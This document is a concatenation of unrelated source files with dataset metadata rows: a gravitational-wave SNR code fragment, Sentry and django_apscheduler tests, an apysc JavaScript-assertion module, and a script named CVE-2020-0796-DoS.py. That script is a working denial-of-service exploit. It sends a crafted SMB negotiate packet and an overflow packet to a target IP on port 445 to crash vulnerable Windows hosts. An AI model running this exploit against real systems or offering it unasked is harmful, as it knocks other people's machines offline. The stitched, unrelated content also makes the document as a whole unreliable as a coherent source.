    # swap sentinel (merged) frequencies for each source's largest real frequency
    capped_f = np.where(np.logical_and(e_evol == 0.0, f_orb_evol == 1e2 * u.Hz),
                        -1 * u.Hz, f_orb_evol).max(axis=1)
    for ind in range(len(f_orb_evol)):
        f_orb_evol[ind][f_orb_evol[ind] == 1e2 * u.Hz] = capped_f[ind]
    # frequency evolution of every harmonic, shape (source, step, harmonic)
    harmonics = np.arange(1, harmonics_required + 1).astype(int)
    f_n_evol = harmonics[np.newaxis, np.newaxis, :] * f_orb_evol[..., np.newaxis]
    # squared characteristic strain of the signal in each harmonic
    h_c_n_2 = strain.h_c_n(m_c=m_c, f_orb=f_orb_evol, ecc=e_evol, n=harmonics, dist=dist,
                           position=position, polarisation=polarisation, inclination=inclination,
                           interpolated_g=interpolated_g)**2
    # characteristic noise power at each harmonic frequency
    if interpolated_sc is None:
        h_f_lisa = psd.power_spectral_density(f=f_n_evol.flatten(), t_obs=t_obs,
                                              instrument=instrument, custom_psd=custom_psd)
    else:
        h_f_lisa = interpolated_sc(f_n_evol.flatten())
    h_f_lisa = h_f_lisa.reshape(f_n_evol.shape)
    h_c_lisa_2 = f_n_evol**2 * h_f_lisa
    # integrate each harmonic over its own frequency evolution
    snr_n_2 = np.trapz(y=h_c_n_2 / h_c_lisa_2, x=f_n_evol, axis=1)
    if ret_snr2_by_harmonic:
        return snr_n_2
    # sum over harmonics and take the square root for the total SNR
    snr = np.sqrt(snr_n_2.sum(axis=1))
    if ret_max_snr_harmonic:
        return snr, np.argmax(snr_n_2, axis=1) + 1
    return snr
| 38.360097
| 110
| 0.661614
| 2,339
| 15,766
| 4.236426
| 0.099615
| 0.01978
| 0.016954
| 0.01211
| 0.850237
| 0.823191
| 0.802906
| 0.796448
| 0.781108
| 0.767686
| 0
| 0.014688
| 0.252949
| 15,766
| 410
| 111
| 38.453659
| 0.826626
| 0.552899
| 0
| 0.444444
| 0
| 0
| 0.013651
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.027778
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
58739c434d6fe1bf754096d072202b7c23ac5f69
| 2,508
|
py
|
Python
|
tests/sentry/api/endpoints/test_broadcast_details.py
|
pierredup/sentry
|
0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80
|
[
"BSD-3-Clause"
] | 1
|
2019-10-17T17:46:16.000Z
|
2019-10-17T17:46:16.000Z
|
tests/sentry/api/endpoints/test_broadcast_details.py
|
pierredup/sentry
|
0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80
|
[
"BSD-3-Clause"
] | null | null | null |
tests/sentry/api/endpoints/test_broadcast_details.py
|
pierredup/sentry
|
0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
import six
from sentry.models import Broadcast, BroadcastSeen
from sentry.testutils import APITestCase
class BroadcastDetailsTest(APITestCase):
    """Tests for fetching a single broadcast from the details endpoint."""

    def test_simple(self):
        # create one active and one inactive broadcast; fetch the active one
        active = Broadcast.objects.create(message="bar", is_active=True)
        Broadcast.objects.create(message="foo", is_active=False)
        self.login_as(user=self.user)
        url = u"/api/0/broadcasts/{}/".format(active.id)
        response = self.client.get(url)
        assert response.status_code == 200
        assert response.data["id"] == six.text_type(active.id)
class BroadcastUpdateTest(APITestCase):
    """Tests for updating a broadcast via PUT.

    Both tests send the same payload ("hasSeen" plus a new "message");
    the asserts show that the "seen" flag is recorded for any user with
    the permission, but the message edit is only applied for a superuser.
    """
    def test_regular_user(self):
        broadcast1 = Broadcast.objects.create(message="bar", is_active=True)
        broadcast2 = Broadcast.objects.create(message="foo", is_active=False)
        self.add_user_permission(user=self.user, permission="broadcasts.admin")
        self.login_as(user=self.user)
        response = self.client.put(
            u"/api/0/broadcasts/{}/".format(broadcast1.id), {"hasSeen": "1", "message": "foobar"}
        )
        assert response.status_code == 200
        assert response.data["hasSeen"]
        # the "seen" marker is created only for the broadcast that was PUT
        assert BroadcastSeen.objects.filter(user=self.user, broadcast=broadcast1).exists()
        assert not BroadcastSeen.objects.filter(user=self.user, broadcast=broadcast2).exists()
        # non-superuser: the "message" field in the payload must NOT be applied
        broadcast1 = Broadcast.objects.get(id=broadcast1.id)
        assert broadcast1.message == "bar"
        broadcast2 = Broadcast.objects.get(id=broadcast2.id)
        assert broadcast2.message == "foo"
    def test_superuser(self):
        broadcast1 = Broadcast.objects.create(message="bar", is_active=True)
        broadcast2 = Broadcast.objects.create(message="foo", is_active=False)
        self.add_user_permission(user=self.user, permission="broadcasts.admin")
        self.login_as(user=self.user, superuser=True)
        response = self.client.put(
            u"/api/0/broadcasts/{}/".format(broadcast1.id), {"hasSeen": "1", "message": "foobar"}
        )
        assert response.status_code == 200
        assert response.data["hasSeen"]
        assert BroadcastSeen.objects.filter(user=self.user, broadcast=broadcast1).exists()
        assert not BroadcastSeen.objects.filter(user=self.user, broadcast=broadcast2).exists()
        # superuser: the message edit IS applied, and only to the targeted broadcast
        broadcast1 = Broadcast.objects.get(id=broadcast1.id)
        assert broadcast1.message == "foobar"
        broadcast2 = Broadcast.objects.get(id=broadcast2.id)
        assert broadcast2.message == "foo"
| 41.114754
| 97
| 0.689394
| 289
| 2,508
| 5.892734
| 0.207612
| 0.093952
| 0.063418
| 0.102173
| 0.831474
| 0.831474
| 0.831474
| 0.812096
| 0.785672
| 0.735173
| 0
| 0.019052
| 0.183812
| 2,508
| 60
| 98
| 41.8
| 0.812897
| 0
| 0
| 0.622222
| 0
| 0
| 0.074163
| 0.02512
| 0
| 0
| 0
| 0
| 0.311111
| 1
| 0.066667
| false
| 0
| 0.088889
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
543b67388ed70f0bb63b95f51eeb3b46c3853782
| 19,767
|
py
|
Python
|
apysc/_console/assertion.py
|
simon-ritchie/apyscript
|
c319f8ab2f1f5f7fad8d2a8b4fc06e7195476279
|
[
"MIT"
] | 16
|
2021-04-16T02:01:29.000Z
|
2022-01-01T08:53:49.000Z
|
apysc/_console/assertion.py
|
simon-ritchie/apysc
|
61d0078e5f3b702eaacceedfbe6e5cafe48f8033
|
[
"MIT"
] | 613
|
2021-03-24T03:37:38.000Z
|
2022-03-26T10:58:37.000Z
|
apysc/_console/assertion.py
|
simon-ritchie/apyscript
|
c319f8ab2f1f5f7fad8d2a8b4fc06e7195476279
|
[
"MIT"
] | 2
|
2021-06-20T07:32:58.000Z
|
2021-12-26T08:22:11.000Z
|
"""Each js assertion (console.assert) interface implementations.
Mainly following interfaces are defined:
- assert_equal
JavaScript assertion interface for equal condition.
- assert_not_equal
JavaScript assertion interface for not equal condition.
- assert_true
JavaScript assertion interface for true condition.
- assert_false
JavaScript assertion interface for false condition.
- assert_arrays_equal
JavaScript assertion interface for Array values equal condition.
- assert_arrays_not_equal
JavaScript assertion interface for Array values not equal condition.
- assert_dicts_equal
JavaScript assertion interface for Dictionary values equal condition.
- assert_dicts_not_equal
JavaScript assertion interface for Dictionary values not equal
condition.
- assert_defined
JavaScript assertion interface for defined (not undefined)
value condition.
- assert_undefined
JavaScript assertion interface for undefined value condition.
"""
from typing import Any
from typing import Tuple
def assert_equal(
        left: Any, right: Any, *, msg: str = '') -> None:
    """
    JavaScript assertion interface for the equal condition.

    Notes
    -----
    - If either value is an Array (or list, etc) type, then
      assert_arrays_equal is called instead of this function.
    - If either value is a Dictionary (or dict, etc) type, then
      assert_dicts_equal is called instead of this function.

    Parameters
    ----------
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_equal, locals_=locals(),
            module_name=__name__):
        from apysc._string import string_util
        # Array dispatch is checked for both values before Dictionary dispatch.
        if any(_value_type_is_array(value=val) for val in (left, right)):
            assert_arrays_equal(left=left, right=right, msg=msg)
            return
        if any(_value_type_is_dict(value=val) for val in (left, right)):
            assert_dicts_equal(left=left, right=right, msg=msg)
            return
        _trace_info(
            interface_label='assert_equal', left=left, right=right)
        left_str, right_str = _get_left_and_right_strs(
            left=left, right=right)
        escaped_msg: str = string_util.escape_str(string=msg)
        expr: str = (
            f'console.assert({left_str} === {right_str}, "{escaped_msg}");'
        )
        ap.append_js_expression(expression=expr)
def assert_not_equal(
        left: Any, right: Any, *, msg: str = '') -> None:
    """
    JavaScript assertion interface for the not equal condition.

    Notes
    -----
    - If either value is an Array (or list, etc) type, then
      assert_arrays_not_equal is called instead of this function.
    - If either value is a Dictionary (or dict, etc) type, then
      assert_dicts_not_equal is called instead of this function.

    Parameters
    ----------
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_not_equal, locals_=locals(),
            module_name=__name__):
        from apysc._string import string_util
        # Array dispatch is checked for both values before Dictionary dispatch.
        if any(_value_type_is_array(value=val) for val in (left, right)):
            assert_arrays_not_equal(left=left, right=right, msg=msg)
            return
        if any(_value_type_is_dict(value=val) for val in (left, right)):
            assert_dicts_not_equal(left=left, right=right, msg=msg)
            return
        _trace_info(
            interface_label='assert_not_equal',
            left=left,
            right=right)
        left_str, right_str = _get_left_and_right_strs(
            left=left, right=right)
        escaped_msg: str = string_util.escape_str(string=msg)
        expr: str = (
            f'console.assert({left_str} !== {right_str}, "{escaped_msg}");'
        )
        ap.append_js_expression(expression=expr)
def assert_true(
        value: Any, *, type_strict: bool = True, msg: str = '') -> None:
    """
    JavaScript assertion interface for the true condition.

    Parameters
    ----------
    value : *
        Target value to check.
    type_strict : bool, default True
        Whether to check the actual value strictly or not.
        For example, if type_strict is True, integer 1 will fail;
        on the contrary (if type_strict is False), integer 1
        will pass the test.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_true, locals_=locals(),
            module_name=__name__):
        from apysc._string import string_util
        _trace_info(
            interface_label='assert_true', left='true', right=value)
        _, value_str = _get_left_and_right_strs(left='_', right=value)
        escaped_msg: str = string_util.escape_str(string=msg)
        # `==` becomes `===` below when type_strict is True
        expr: str = f'console.assert({value_str} =='
        expr = _add_equal_if_type_strict_setting_is_true(
            expression=expr, type_strict=type_strict)
        expr = f'{expr} true, "{escaped_msg}");'
        ap.append_js_expression(expression=expr)
def assert_false(
        value: Any, *, type_strict: bool = True, msg: str = '') -> None:
    """
    JavaScript assertion interface for the false condition.

    Parameters
    ----------
    value : *
        Target value to check.
    type_strict : bool, default True
        Whether to check the actual value strictly or not.
        For example, if type_strict is True, integer 0 will fail;
        on the contrary (if type_strict is False), integer 0
        will pass the test.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_false, locals_=locals(),
            module_name=__name__):
        from apysc._string import string_util
        _trace_info(
            interface_label='assert_false', left='false', right=value)
        _, value_str = _get_left_and_right_strs(left='_', right=value)
        escaped_msg: str = string_util.escape_str(string=msg)
        # `==` becomes `===` below when type_strict is True
        expr: str = f'console.assert({value_str} =='
        expr = _add_equal_if_type_strict_setting_is_true(
            expression=expr, type_strict=type_strict)
        expr = f'{expr} false, "{escaped_msg}");'
        ap.append_js_expression(expression=expr)
def assert_arrays_equal(
        left: Any, right: Any, *, msg: str = '') -> None:
    """
    JavaScript assertion interface for the Array values equal condition.

    Notes
    -----
    Used in place of assert_equal for Array class comparison,
    since JavaScript cannot compare arrays directly like Python can
    (for example, `[1, 2] === [1, 2]` evaluates to false).

    Parameters
    ----------
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_arrays_equal, locals_=locals(),
            module_name=__name__):
        _trace_arrays_or_dicts_assertion_info(
            interface_label='assert_arrays_equal',
            left=left, right=right)
        expr: str = _make_arrays_or_dicts_comparison_expression(
            left=left, right=right, msg=msg, not_condition=False)
        ap.append_js_expression(expression=expr)
def assert_arrays_not_equal(
        left: Any, right: Any, *, msg: str = '') -> None:
    """
    JavaScript assertion interface for the Array values not equal condition.

    Notes
    -----
    Used in place of assert_not_equal for Array class comparison,
    since JavaScript cannot compare arrays directly like Python can
    (for example, `[1, 2] === [1, 2]` evaluates to false).

    Parameters
    ----------
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_arrays_not_equal, locals_=locals(),
            module_name=__name__):
        _trace_arrays_or_dicts_assertion_info(
            interface_label='assert_arrays_not_equal',
            left=left, right=right)
        expr: str = _make_arrays_or_dicts_comparison_expression(
            left=left, right=right, msg=msg, not_condition=True)
        ap.append_js_expression(expression=expr)
def assert_dicts_equal(left: Any, right: Any, *, msg: str = '') -> None:
    """
    JavaScript assertion interface for the Dictionary values equal
    condition.

    Notes
    -----
    Used in place of assert_equal for Dictionary class comparison,
    since JavaScript cannot compare dictionaries (Objects) directly
    like Python can (for example, `{"a": 10} === {"a": 10}`
    evaluates to false).

    Parameters
    ----------
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_dicts_equal, locals_=locals(),
            module_name=__name__):
        _trace_arrays_or_dicts_assertion_info(
            interface_label='assert_dicts_equal',
            left=left, right=right)
        expr: str = _make_arrays_or_dicts_comparison_expression(
            left=left, right=right, msg=msg, not_condition=False)
        ap.append_js_expression(expression=expr)
def assert_dicts_not_equal(
        left: Any, right: Any, *, msg: str = '') -> None:
    """
    JavaScript assertion interface for the Dictionary values not equal
    condition.

    Notes
    -----
    Used in place of assert_not_equal for Dictionary class comparison,
    since JavaScript cannot compare dictionaries (Objects) directly
    like Python can (for example, `{"a": 10} !== {"a": 10}`
    evaluates to true).

    Parameters
    ----------
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_dicts_not_equal, locals_=locals(),
            module_name=__name__):
        _trace_arrays_or_dicts_assertion_info(
            interface_label='assert_dicts_not_equal',
            left=left, right=right)
        expr: str = _make_arrays_or_dicts_comparison_expression(
            left=left, right=right, msg=msg, not_condition=True)
        ap.append_js_expression(expression=expr)
def assert_defined(value: Any, *, msg: str = '') -> None:
    """
    JavaScript assertion interface for the defined (not undefined)
    value condition.

    Parameters
    ----------
    value : *
        Target value to check.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_defined, locals_=locals(),
            module_name=__name__):
        from apysc._string import string_util
        _trace_info(
            interface_label='assert_defined', left='other than undefined',
            right=value)
        _, target_str = _get_left_and_right_strs(left='_', right=value)
        escaped_msg: str = string_util.escape_str(string=msg)
        expr: str = (
            f'console.assert(!_.isUndefined({target_str}), "{escaped_msg}");'
        )
        ap.append_js_expression(expression=expr)
def assert_undefined(value: Any, *, msg: str = '') -> None:
    """
    JavaScript assertion interface for the undefined value condition.

    Parameters
    ----------
    value : *
        Target value to check.
    msg : str, optional
        Message to display when the assertion fails.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=assert_undefined, locals_=locals(),
            module_name=__name__):
        from apysc._string import string_util
        _trace_info(
            interface_label='assert_undefined', left='undefined',
            right=value)
        _, target_str = _get_left_and_right_strs(left='_', right=value)
        escaped_msg: str = string_util.escape_str(string=msg)
        expr: str = (
            f'console.assert(_.isUndefined({target_str}), "{escaped_msg}");'
        )
        ap.append_js_expression(expression=expr)
def _make_arrays_or_dicts_comparison_expression(
        *, left: Any, right: Any, msg: str,
        not_condition: bool) -> str:
    """
    Make an arrays or dicts comparison (assert_arrays_equal,
    assert_arrays_not_equal, assert_dicts_equal, or
    assert_dicts_not_equal) expression string.

    Parameters
    ----------
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    msg : str
        Message to display when the assertion fails.
    not_condition : bool
        Boolean value indicating whether this expression is a
        not-equal condition (e.g., assert_arrays_not_equal) or not.

    Returns
    -------
    expression : str
        Result expression string.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=_make_arrays_or_dicts_comparison_expression,
            locals_=locals(),
            module_name=__name__):
        from apysc._string import string_util
        from apysc._type import value_util
        left_exp_str: str = value_util.get_value_str_for_expression(
            value=left)
        right_exp_str: str = value_util.get_value_str_for_expression(
            value=right)
        escaped_msg: str = string_util.escape_str(string=msg)
        # prepend `!` to negate the lodash equality check when required
        not_condition_str: str = '!' if not_condition else ''
        expression: str = (
            f'console.assert({not_condition_str}_.isEqual({left_exp_str}, '
            f'{right_exp_str}), "{escaped_msg}");'
        )
        return expression
def _trace_arrays_or_dicts_assertion_info(
        *, interface_label: str, left: Any, right: Any) -> None:
    """
    Append arrays or dicts value's information trace expression.

    Parameters
    ----------
    interface_label : str
        Target assertion interface label, e.g., 'assert_arrays_equal'.
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=_trace_arrays_or_dicts_assertion_info, locals_=locals(),
            module_name=__name__):
        from apysc._type import value_util
        left_exp_str: str = value_util.get_value_str_for_expression(
            value=left)
        if isinstance(left, dict):
            left_exp_str = left_exp_str.replace('"', '')
        right_exp_str: str = value_util.get_value_str_for_expression(
            value=right)
        if isinstance(right, dict):
            right_exp_str = right_exp_str.replace('"', '')
        # Bug fix: right_info_str was previously only assigned in the
        # `else` branch, so an Array/Dictionary `left` raised NameError
        # at the _trace_info call below. Assign it unconditionally.
        # NOTE(review): only the left side is expanded with its Python
        # value; the right side is not — confirm whether intended.
        right_info_str: str = right_exp_str
        if isinstance(left, (ap.Array, ap.Dictionary)):
            value_str: str = value_util.get_value_str_for_expression(
                value=left.value)
            value_str = value_str.replace('"', '')
            left_info_str: str = f'{left_exp_str} ({value_str})'
        else:
            left_info_str = left_exp_str
        _trace_info(
            interface_label=interface_label,
            left=left_info_str,
            right=right_info_str)
def _value_type_is_array(*, value: Any) -> bool:
    """
    Get a boolean value indicating whether the specified value is
    Array type or not.

    Parameters
    ----------
    value : *
        Target value to check.

    Returns
    -------
    result : bool
        If the value type is Array, True will be returned.
    """
    import apysc as ap
    # isinstance already returns a bool, so return it directly
    # instead of the `if ...: return True / return False` pattern.
    return isinstance(value, ap.Array)
def _value_type_is_dict(*, value: Any) -> bool:
    """
    Get a boolean value indicating whether the specified value is
    Dictionary type or not.

    Parameters
    ----------
    value : *
        Target value to check.

    Returns
    -------
    result : bool
        If the value type is Dictionary, True will be returned.
    """
    from apysc._type.dictionary_structure import DictionaryStructure
    # isinstance already returns a bool, so return it directly
    # instead of the `if ...: return True / return False` pattern.
    return isinstance(value, DictionaryStructure)
def _add_equal_if_type_strict_setting_is_true(
*, expression: str, type_strict: bool) -> str:
"""
Add single equal character to expression if type_string setting
is True.
Parameters
----------
expression : str
Expression to be added.
type_strict: bool
Type strict setting value.
Returns
-------
expression : str
If type_string setting is true, then single equal character
will be added to tail.
"""
if not type_strict:
return expression
expression += '='
return expression
def _get_left_and_right_strs(
        *, left: Any, right: Any) -> Tuple[str, str]:
    """
    Get left- and right-side value strings from the specified values.

    Parameters
    ----------
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.

    Returns
    -------
    left_str : str
        Left-side value's string. A string value will be wrapped
        by double quotation.
    right_str : str
        Right-side value's string. A string value will be wrapped
        by double quotation.
    """
    from apysc._type import value_util
    converted = tuple(
        value_util.get_value_str_for_expression(value=val)
        for val in (left, right))
    return converted
def _trace_info(*, interface_label: str, left: Any, right: Any) -> None:
    """
    Append a trace expression of the specified values.

    Parameters
    ----------
    interface_label : str
        Target assertion interface label, e.g., 'assert_equal'.
    left : *
        Left-side value to compare.
    right : *
        Right-side value to compare.
    """
    import apysc as ap
    with ap.DebugInfo(
            callable_=_trace_info, locals_=locals(),
            module_name=__name__):
        from apysc._type.variable_name_interface import VariableNameInterface
        trace_text: str = f'[{interface_label}]'
        # include variable names when either side is an apysc variable
        if isinstance(left, VariableNameInterface):
            trace_text = (
                trace_text
                + f'\nLeft-side variable name: {left.variable_name}')
        if isinstance(right, VariableNameInterface):
            trace_text = (
                trace_text
                + f'\nRight-side variable name: {right.variable_name}')
        ap.trace(trace_text, '\nLeft value:', left, 'right value:', right)
| 32.404918
| 79
| 0.609248
| 2,269
| 19,767
| 5.047598
| 0.066108
| 0.01886
| 0.048895
| 0.054134
| 0.833843
| 0.817428
| 0.787829
| 0.770279
| 0.751681
| 0.70427
| 0
| 0.001449
| 0.301614
| 19,767
| 609
| 80
| 32.458128
| 0.828178
| 0.360702
| 0
| 0.603922
| 0
| 0
| 0.069761
| 0.028452
| 0
| 0
| 0
| 0
| 0.184314
| 1
| 0.066667
| false
| 0
| 0.109804
| 0
| 0.223529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5495fdd0f647d9922da485a1f10301c1c1883eeb
| 38
|
py
|
Python
|
alphaorm/__init__.py
|
emetowinner/python-alpha-orm
|
045c77d93c7c75956f19d40565c0c806bd18b6c6
|
[
"MIT"
] | 2
|
2019-12-06T05:18:31.000Z
|
2020-11-07T01:53:51.000Z
|
alphaorm/__init__.py
|
emetowinner/python-alpha-orm
|
045c77d93c7c75956f19d40565c0c806bd18b6c6
|
[
"MIT"
] | 7
|
2020-04-12T23:18:16.000Z
|
2020-09-30T17:41:09.000Z
|
alphaorm/__init__.py
|
emetowinner/python-alpha-orm
|
045c77d93c7c75956f19d40565c0c806bd18b6c6
|
[
"MIT"
] | 2
|
2019-12-06T05:18:31.000Z
|
2020-09-29T09:45:03.000Z
|
from alphaorm.AlphaORM import AlphaORM
| 38
| 38
| 0.894737
| 5
| 38
| 6.8
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 38
| 1
| 38
| 38
| 0.971429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
49b3a3dcd9c885170d2859f6709bc139ac64a662
| 834
|
py
|
Python
|
CVE-2020-0796-DoS.py
|
cory-zajicek/CVE-2020-0796-Scanner
|
35b40e7dafba6da5093637437a58bada428b0f89
|
[
"MIT"
] | 2
|
2020-06-06T08:14:32.000Z
|
2021-12-05T20:41:41.000Z
|
CVE-2020-0796-DoS.py
|
cory-zajicek/CVE-2020-0796-Scanner
|
35b40e7dafba6da5093637437a58bada428b0f89
|
[
"MIT"
] | null | null | null |
CVE-2020-0796-DoS.py
|
cory-zajicek/CVE-2020-0796-Scanner
|
35b40e7dafba6da5093637437a58bada428b0f89
|
[
"MIT"
] | 2
|
2020-06-10T10:52:29.000Z
|
2021-12-05T20:41:42.000Z
|
import socket, sys
if len(sys.argv) != 2:
sys.exit("Usage: <script>.py <target IP>")
bytes_a = b"\x00\x00\x00\xc6\xfeSMB@"
bytes_b = b'\x00$\x00\x08\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x01\x02\xab\xcd\x01\x02\xab\xcd\x01\x02\xab\xcd\x01\x02\xab\xcdx\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01'
bytes_c = b"\x03\x00\x0e\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x02\x00\x03"
smb_connect = bytes_a + b"\x00"*58 + bytes_b + b"\x00"*35 + bytes_c + b"\x00"*9
overflow = b"\x00\x00\x00B\xfcSMB2\x00\x00\x00\x01\x00\x00\x00" + b"\xff"*4 + b"A"*50
s = socket.socket(socket.AF_INET)
s.settimeout(2)
s.connect((sys.argv[1], 445))
s.send(smb_connect)
s.recv(3000)
s.send(overflow)
s.close()
| 37.909091
| 276
| 0.671463
| 177
| 834
| 3.112994
| 0.293785
| 0.381125
| 0.326679
| 0.174229
| 0.299456
| 0.23412
| 0.23412
| 0.08167
| 0.08167
| 0.08167
| 0
| 0.271277
| 0.098321
| 834
| 21
| 277
| 39.714286
| 0.461436
| 0
| 0
| 0
| 0
| 0.2
| 0.573186
| 0.504305
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b721e3a4ed4bdd26e7dde9a0881fd89e06a57b25
| 11,866
|
py
|
Python
|
tests/test_jobstores.py
|
calledbert/django-apscheduler
|
8947bb55976718b634e81ad54b64f53e300d12df
|
[
"MIT"
] | 331
|
2016-07-12T07:03:08.000Z
|
2021-01-26T23:23:36.000Z
|
tests/test_jobstores.py
|
calledbert/django-apscheduler
|
8947bb55976718b634e81ad54b64f53e300d12df
|
[
"MIT"
] | 115
|
2016-07-07T15:23:25.000Z
|
2021-01-21T17:16:10.000Z
|
tests/test_jobstores.py
|
calledbert/django-apscheduler
|
8947bb55976718b634e81ad54b64f53e300d12df
|
[
"MIT"
] | 92
|
2016-11-01T16:10:06.000Z
|
2021-01-25T03:59:58.000Z
|
import warnings
from datetime import datetime
from unittest import mock
import pytest
from apscheduler import events
from apscheduler.events import JobExecutionEvent, JobSubmissionEvent
from django import db
from django.utils import timezone
from django_apscheduler.jobstores import (
DjangoJobStore,
register_job,
register_events,
)
from django_apscheduler.models import DjangoJob, DjangoJobExecution
from tests import conftest
from tests.conftest import DummyScheduler, dummy_job
class TestDjangoResultStoreMixin:
    def test_start_gets_scheduler_lock(self):
        """Starting the store must acquire the scheduler-supplied lock."""
        job_store = DjangoJobStore()
        job_store.start(DummyScheduler(), "djangojobstore")

        assert job_store.lock is not None

    @pytest.mark.django_db
    def test_handle_submission_event_not_supported_raises_exception(self, jobstore):
        # EVENT_ALL is not a supported submission code, so the handler must refuse it.
        evt = JobSubmissionEvent(
            events.EVENT_ALL, "test_job", jobstore, [timezone.now()]
        )

        with pytest.raises(NotImplementedError):
            jobstore.handle_submission_event(evt)

    @pytest.mark.django_db
    @pytest.mark.parametrize(
        "event_code",
        [
            events.EVENT_JOB_SUBMITTED,
            events.EVENT_JOB_MAX_INSTANCES,
        ],
    )
    def test_handle_submission_event_creates_job_execution(
        self, event_code, jobstore, create_add_job
    ):
        # Both supported submission codes should create a DjangoJobExecution row.
        scheduled_job = create_add_job(jobstore, dummy_job, datetime(2016, 5, 3))
        evt = JobSubmissionEvent(
            event_code, scheduled_job.id, jobstore, [timezone.now()]
        )
        jobstore.handle_submission_event(evt)

        assert DjangoJobExecution.objects.filter(job_id=evt.job_id).exists()

    @pytest.mark.django_db(transaction=True)
    def test_handle_submission_event_for_job_that_no_longer_exists_does_not_raise_exception(
        self, jobstore
    ):
        # Submission events for jobs that were already removed are ignored silently.
        evt = JobSubmissionEvent(
            events.EVENT_JOB_SUBMITTED, "finished_job", jobstore, [timezone.now()]
        )
        jobstore.handle_submission_event(evt)

        assert not DjangoJobExecution.objects.filter(job_id=evt.job_id).exists()

    @pytest.mark.django_db
    def test_handle_execution_event_not_supported_raises_exception(self, jobstore):
        evt = JobExecutionEvent(
            events.EVENT_ALL, "test_job", jobstore, timezone.now()
        )

        with pytest.raises(NotImplementedError):
            jobstore.handle_execution_event(evt)

    @pytest.mark.django_db
    def test_handle_execution_event_creates_job_execution(
        self, jobstore, create_add_job
    ):
        scheduled_job = create_add_job(jobstore, dummy_job, datetime(2016, 5, 3))
        evt = JobExecutionEvent(
            events.EVENT_JOB_EXECUTED, scheduled_job.id, jobstore, timezone.now()
        )
        jobstore.handle_execution_event(evt)

        assert DjangoJobExecution.objects.filter(job_id=evt.job_id).exists()

    @pytest.mark.django_db(transaction=True)
    def test_handle_execution_event_for_job_that_no_longer_exists_does_not_raise_exception_regression_116(
        self, jobstore
    ):
        # Regression test for https://github.com/jcass77/django-apscheduler/issues/116
        evt = JobExecutionEvent(
            events.EVENT_JOB_EXECUTED, "finished_job", jobstore, timezone.now()
        )
        jobstore.handle_execution_event(evt)

